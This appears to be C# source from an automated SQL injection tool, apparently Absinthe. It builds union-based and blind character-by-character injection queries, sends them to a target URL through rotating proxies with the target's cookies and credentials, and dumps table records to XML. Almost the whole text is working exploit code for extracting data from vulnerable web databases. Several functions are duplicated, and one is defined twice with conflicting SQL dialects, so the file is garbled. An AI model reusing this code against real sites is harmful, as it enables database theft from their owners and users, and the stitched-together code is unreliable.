// }}}
// {{{ SelectValueForGivenPrimaryKey
public string SelectValueForGivenPrimaryKey(string FieldName, string TableName, Absinthe.Core.GlobalDS.PrimaryKey pk)
{
StringBuilder retVal = new StringBuilder();
retVal.Append("SELECT TOP 1 ").Append(FieldName).Append(" FROM ").Append(TableName);
retVal.Append(" WHERE ").Append(pk.Name).Append("=").Append(pk.Value);
return(retVal.ToString());
}
private GlobalDS.PrimaryKey IteratePrimaryKey(string TableName, string KeyName, GlobalDS.PrimaryKey CurrentPrimaryKey, SqlDbType PrimaryKeyType)
{
StringBuilder WhereClause = new StringBuilder();
if (CurrentPrimaryKey.Name == KeyName)
{
WhereClause.Append(KeyName).Append(" > ").Append(CurrentPrimaryKey.Value);
}
_AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(58) + convert(char, min(" + KeyName + ")) + char(58)", TableName, WhereClause.ToString());
string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
string ResultText = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin);
ResultText = ResultText.Substring(1, ResultText.Length - 2);
string WorkingText = "";
switch (PrimaryKeyType)
{
case SqlDbType.VarChar:
case SqlDbType.Char:
case SqlDbType.NChar:
case SqlDbType.NText:
case SqlDbType.NVarChar:
case SqlDbType.Text:
StringBuilder ElementBuilder = new StringBuilder();
//split
char[] TextElements = ResultText.ToCharArray();
for (int i = 0; i < TextElements.Length; i++)
{
ElementBuilder.Append("char(").Append(Char.GetNumericValue(TextElements[i])).Append(") + ");
}
ElementBuilder.Remove(ElementBuilder.Length - 2, 2); // remove trailing '+ '
WorkingText = ElementBuilder.ToString();
break;
default:
WorkingText = ResultText.Trim();
break;
}
GlobalDS.PrimaryKey retVal = new GlobalDS.PrimaryKey();
retVal.Name = KeyName;
retVal.Value = WorkingText;
retVal.OutputValue = ResultText;
return(retVal);
}
// }}}
// {{{ GetRecord
private Hashtable GetRecord(string TableName, GlobalDS.Field[] Columns, GlobalDS.PrimaryKey pk)
{
int ColumnCounter;
Hashtable retVal = new Hashtable();
for (ColumnCounter = 0; ColumnCounter < Columns.Length; ColumnCounter++)
{
DictionaryEntry de = GetFieldData(TableName, Columns[ColumnCounter], pk);
retVal.Add(de.Key, de.Value);
}
return(retVal);
}
// }}}
// {{{ PullDataFromIndividualTable
private List <Hashtable> PullDataFromIndividualTable(GlobalDS.Table SrcTable, long[] ColumnIDs, ref XmlTextWriter xOutput)
{
List <Hashtable> retVal = new List <Hashtable>();
long RecordCounter = 0;
GlobalDS.Field[] ColumnList = new GlobalDS.Field[ColumnIDs.Length];
GlobalDS.PrimaryKey CurrentPrimaryKey = new GlobalDS.PrimaryKey();
int ColumnCounter = 0;
string PrimaryKeyName = String.Empty;
SqlDbType PrimaryKeyType = SqlDbType.Int;
UserStatus(String.Format("Individual Pulling {0}", SrcTable.Name));
// Generate Field List
for (long FieldCounter = 0; FieldCounter < SrcTable.FieldList.Length; FieldCounter++)
{
UserStatus(String.Format("Going for Field: {0}", SrcTable.FieldList[FieldCounter].FieldName));
if (Array.IndexOf(ColumnIDs, FieldCounter) >= 0)
{
ColumnList[ColumnCounter] = SrcTable.FieldList[FieldCounter];
ColumnCounter++;
}
if (SrcTable.FieldList[FieldCounter].IsPrimary)
{
PrimaryKeyName = SrcTable.FieldList[FieldCounter].FieldName;
PrimaryKeyType = SrcTable.FieldList[FieldCounter].DataType;
}
}
if (PrimaryKeyName.Length > 0)
{
for (RecordCounter = 0; RecordCounter < SrcTable.RecordCount; RecordCounter++)
{
CurrentPrimaryKey = IteratePrimaryKey(SrcTable.Name, PrimaryKeyName, CurrentPrimaryKey, PrimaryKeyType);
Hashtable Record = GetRecord(SrcTable.Name, ColumnList, CurrentPrimaryKey);
retVal.Add(Record);
OutputRecordToFile(ref xOutput, Record, CurrentPrimaryKey);
}
}
return(retVal);
}
// }}}
// {{{ SelectCharacterValueForConvertedRecordValue
public string SelectCharacterValueForConvertedRecordValue(long Index, string FieldName, string TableName, Absinthe.Core.GlobalDS.PrimaryKey pk)
{
StringBuilder retVal = new StringBuilder();
retVal.Append("SELECT ASCII(SUBSTRING(CONVERT(VarChar,").Append(FieldName).Append("),").Append(Index);
retVal.Append(",1)) FROM ").Append(TableName).Append(" WHERE ").Append(pk.Name).Append(" = ").Append(pk.Value);
return(retVal.ToString());
}
// }}}
// {{{ SelectLengthOfConvertedRecordValue
public string SelectLengthOfConvertedRecordValue(string FieldName, string TableName, Absinthe.Core.GlobalDS.PrimaryKey pk)
{
StringBuilder retVal = new StringBuilder();
retVal.Append("SELECT TOP 1 LENGTH(CONVERT(VarChar,").Append(FieldName).Append(")) FROM ").Append(TableName);
retVal.Append(" WHERE ").Append(pk.Name).Append("=").Append(pk.Value);
return(retVal.ToString());
}
// }}}
// {{{ SelectCharacterValueForGivenPrimaryKey
public string SelectCharacterValueForGivenPrimaryKey(long Index, string FieldName, string TableName, Absinthe.Core.GlobalDS.PrimaryKey pk)
{
StringBuilder retVal = new StringBuilder();
retVal.Append("SELECT ASCII(SUBSTR(").Append(FieldName).Append(",").Append(Index).Append(",1)) FROM ");
retVal.Append(TableName).Append(" WHERE ").Append(pk.Name).Append("=").Append(pk.Value);
return(retVal.ToString());
}
// }}}
// {{{ SelectLengthOfConvertedRecordValue
public string SelectLengthOfConvertedRecordValue(string FieldName, string TableName, Absinthe.Core.GlobalDS.PrimaryKey pk)
{
StringBuilder retVal = new StringBuilder();
retVal.Append("SELECT LENGTH(TO_CHAR(").Append(FieldName).Append(")) FROM ").Append(TableName);
retVal.Append(" WHERE ROWNUM=1 AND ").Append(pk.Name).Append("=").Append(pk.Value);
return(retVal.ToString());
}
// }}}
// {{{ GetFieldData
private DictionaryEntry GetFieldData(string TableName, GlobalDS.Field Column, GlobalDS.PrimaryKey pk)
{
DictionaryEntry retVal = new DictionaryEntry();
retVal.Key = Column.FieldName;
retVal.Value = string.Empty;
if (Column.FieldName.Equals(pk.Name))
{
retVal.Value = pk.Value;
return(retVal);
}
StringBuilder SelectClause = new StringBuilder();
switch (Column.DataType)
{
case SqlDbType.BigInt:
case SqlDbType.SmallInt:
case SqlDbType.TinyInt:
case SqlDbType.Int:
case SqlDbType.Decimal:
case SqlDbType.DateTime:
case SqlDbType.Money:
case SqlDbType.Float:
case SqlDbType.Real:
case SqlDbType.SmallDateTime:
case SqlDbType.SmallMoney:
case SqlDbType.Timestamp:
case SqlDbType.UniqueIdentifier:
//retVal.Value = OpenEndedIntegerSearch(Column.FieldName, TableName, pk);
SelectClause.Append("char(58) + convert(nvarchar, ").Append(Column.FieldName).Append(") + char(58)");
break;
case SqlDbType.NChar:
case SqlDbType.Char:
case SqlDbType.NVarChar:
case SqlDbType.Text:
case SqlDbType.NText:
case SqlDbType.VarChar:
//retVal.Value = GetFieldDataVarChar(Column.FieldName, TableName, pk);
SelectClause.Append("char(58) + convert(nvarchar, ").Append(Column.FieldName).Append(") + char(58)");
break;
case SqlDbType.Bit:
//retVal.Value = GetBitField(Column.FieldName, TableName, pk);
SelectClause.Append("char(58) + convert(nvarchar, ").Append(Column.FieldName).Append(") + char(58)");
break;
case SqlDbType.Image:
case SqlDbType.Binary:
case SqlDbType.VarBinary:
// TODO: Figure out how to support this!
//retVal.Value = null;
break;
}
_AttackParams[_VectorName] = GeneralPurposeUnionTextSelect(SelectClause.ToString(), TableName, pk.Name + " = " + pk.Value);
string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
string ResultText = ParsePage.ParseUnionSelectForNvarchar(ResultPage, _Plugin);
retVal.Value = ResultText.Substring(1, ResultText.Length - 2);
return(retVal);
}
private void OutputRecordToFile(ref XmlTextWriter xOutput, Hashtable DataRecord, GlobalDS.PrimaryKey pk)
{
xOutput.WriteStartElement("DataRecord");
xOutput.WriteStartAttribute("PrimaryKey", null);
xOutput.WriteString(pk.Name);
xOutput.WriteEndAttribute();
xOutput.WriteStartAttribute("PrimaryKeyValue", null);
xOutput.WriteString(pk.OutputValue);
xOutput.WriteEndAttribute();
foreach (string Key in DataRecord.Keys)
{
xOutput.WriteStartElement(Key);
xOutput.WriteString(DataRecord[Key].ToString());
xOutput.WriteEndElement();
}
xOutput.WriteEndElement();
}
private GlobalDS.PrimaryKey IteratePrimaryKey(string TableName, string KeyName, GlobalDS.PrimaryKey CurrentPrimaryKey, SqlDbType PrimaryKeyType)
{
StringBuilder WhereClause = new StringBuilder();
if (CurrentPrimaryKey.Name == KeyName)
{
WhereClause.Append(KeyName).Append(" > ").Append(CurrentPrimaryKey.Value);
}
_AttackParams[_VectorName] = GeneralPurposeUnionTextSelect("char(58) + convert(char, min(" + KeyName + ")) + char(58)", TableName, WhereClause.ToString());
string ResultPage = httpConnect.PageRequest(_TargetURL, _AttackParams, RotatedProxy(), _ConnectViaPost, _Options.Cookies, _Options.AuthCredentials, _Options.UserAgent);
string ResultText = ParsePage.ParseUnionSelectForVarchar(ResultPage, _Plugin);
ResultText = ResultText.Substring(1, ResultText.Length-2);
string WorkingText = "";
switch(PrimaryKeyType)
{
case SqlDbType.VarChar: case SqlDbType.Char: case SqlDbType.NChar: case SqlDbType.NText:
case SqlDbType.NVarChar: case SqlDbType.Text:
StringBuilder ElementBuilder = new StringBuilder();
//split
char[] TextElements = ResultText.ToCharArray();
for (int i=0; i < TextElements.Length; i++)
{
ElementBuilder.Append("char(").Append(Char.GetNumericValue(TextElements[i])).Append(") + ");
}
ElementBuilder.Remove(ElementBuilder.Length -2,2); // remove trailing '+ '
WorkingText = ElementBuilder.ToString();
break;
default:
WorkingText = ResultText.Trim();
break;
}
GlobalDS.PrimaryKey retVal = new GlobalDS.PrimaryKey();
retVal.Name = KeyName;
retVal.Value = WorkingText;
retVal.OutputValue = ResultText;
return retVal;
}
// }}}
// {{{ PullDataFromIndividualTable
private List<Hashtable> PullDataFromIndividualTable(GlobalDS.Table SrcTable, long[] ColumnIDs, ref XmlTextWriter xOutput)
{
List<Hashtable> retVal = new List<Hashtable>();
long RecordCounter = 0;
GlobalDS.Field[] ColumnList = new GlobalDS.Field[ColumnIDs.Length];
GlobalDS.PrimaryKey CurrentPrimaryKey = new GlobalDS.PrimaryKey();
int ColumnCounter = 0;
string PrimaryKeyName = String.Empty;
SqlDbType PrimaryKeyType= SqlDbType.Int;
UserStatus(String.Format("Individual Pulling {0}", SrcTable.Name));
// Generate Field List
for (long FieldCounter = 0; FieldCounter < SrcTable.FieldList.Length; FieldCounter++)
{
UserStatus(String.Format("Going for Field: {0}", SrcTable.FieldList[FieldCounter].FieldName));
if (Array.IndexOf(ColumnIDs, FieldCounter) >= 0)
{
ColumnList[ColumnCounter] = SrcTable.FieldList[FieldCounter];
ColumnCounter++;
}
if (SrcTable.FieldList[FieldCounter].IsPrimary)
{
PrimaryKeyName = SrcTable.FieldList[FieldCounter].FieldName;
PrimaryKeyType = SrcTable.FieldList[FieldCounter].DataType;
}
}
if (PrimaryKeyName.Length > 0)
{
for (RecordCounter = 0; RecordCounter < SrcTable.RecordCount; RecordCounter++)
{
CurrentPrimaryKey = IteratePrimaryKey(SrcTable.Name, PrimaryKeyName, CurrentPrimaryKey, PrimaryKeyType);
Hashtable Record = GetRecord(SrcTable.Name, ColumnList, CurrentPrimaryKey);
retVal.Add(Record);
OutputRecordToFile(ref xOutput, Record, CurrentPrimaryKey);
}
}
return retVal;
}
// }}}
// {{{ IterateIntegerPrimaryKey
private GlobalDS.PrimaryKey IterateIntegerPrimaryKey(string TableName, string KeyName, GlobalDS.PrimaryKey CurrentPrimaryKey)
{
StringBuilder CurrentVector = new StringBuilder();
CurrentVector.Append(_VectorBuffer);
if (CurrentPrimaryKey.Name == KeyName)
{
CurrentVector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.IntegerPrimaryKeyValue(KeyName, TableName, CurrentPrimaryKey.Value)));
}
else
{
CurrentVector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.IntegerPrimaryKeyValue(KeyName, TableName)));
}
// Is there a way to force this to be numeric?!
long Result = RecursiveSearch(1,0,CurrentVector.ToString());
GlobalDS.PrimaryKey retVal = new GlobalDS.PrimaryKey();
retVal.Name = KeyName;
retVal.Value = Result.ToString();
retVal.OutputValue = Result.ToString();
return retVal;
}
// }}}
// {{{ IterateNonIntegerPrimaryKey
private GlobalDS.PrimaryKey IterateNonIntegerPrimaryKey(string TableName, string KeyName, GlobalDS.PrimaryKey CurrentPrimaryKey)
{
StringBuilder CurrentVector = new StringBuilder();
CurrentVector.Append(_VectorBuffer);
if (CurrentPrimaryKey.Name == KeyName)
{
CurrentVector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.LengthOfConvertedPrimaryKeyValue(KeyName, TableName, CurrentPrimaryKey.Value)));
}
else
{
CurrentVector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.LengthOfConvertedPrimaryKeyValue(KeyName, TableName)));
}
long Size = RecursiveSearch(1,0,CurrentVector.ToString());
StringBuilder KeyValueBuilder = new StringBuilder();
StringBuilder KeyOutputValueBuilder = new StringBuilder();
for (long AscCounter = 1; AscCounter <= Size; AscCounter++)
{
CurrentVector = new StringBuilder();
CurrentVector.Append(_VectorBuffer);
if (CurrentPrimaryKey.Name == KeyName)
{
CurrentVector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.ConvertedPrimaryKeyValueCharacter(AscCounter, KeyName, TableName, CurrentPrimaryKey.Value)));
}
else
{
CurrentVector.Append(_PluginData.AndGreaterThanWrapper(_PluginData.ConvertedPrimaryKeyValueCharacter(AscCounter, KeyName, TableName)));
}
long SearchVal = RecursiveSearch( 1, UNICODE_LIMIT, CurrentVector.ToString());
KeyValueBuilder.Append(_PluginData.CharConversionFunction(SearchVal)).Append(_PluginData.ConcatenationCharacter);
KeyOutputValueBuilder.Append(Convert.ToChar(SearchVal));
}
KeyValueBuilder.Remove(KeyValueBuilder.Length - _PluginData.ConcatenationCharacter.Length, _PluginData.ConcatenationCharacter.Length);
GlobalDS.PrimaryKey retVal = new GlobalDS.PrimaryKey();
retVal.Name = KeyName;
//TODO: We should escape this with apostrophes most likely
retVal.Value = KeyValueBuilder.ToString();
retVal.OutputValue = KeyOutputValueBuilder.ToString();
return retVal;
}
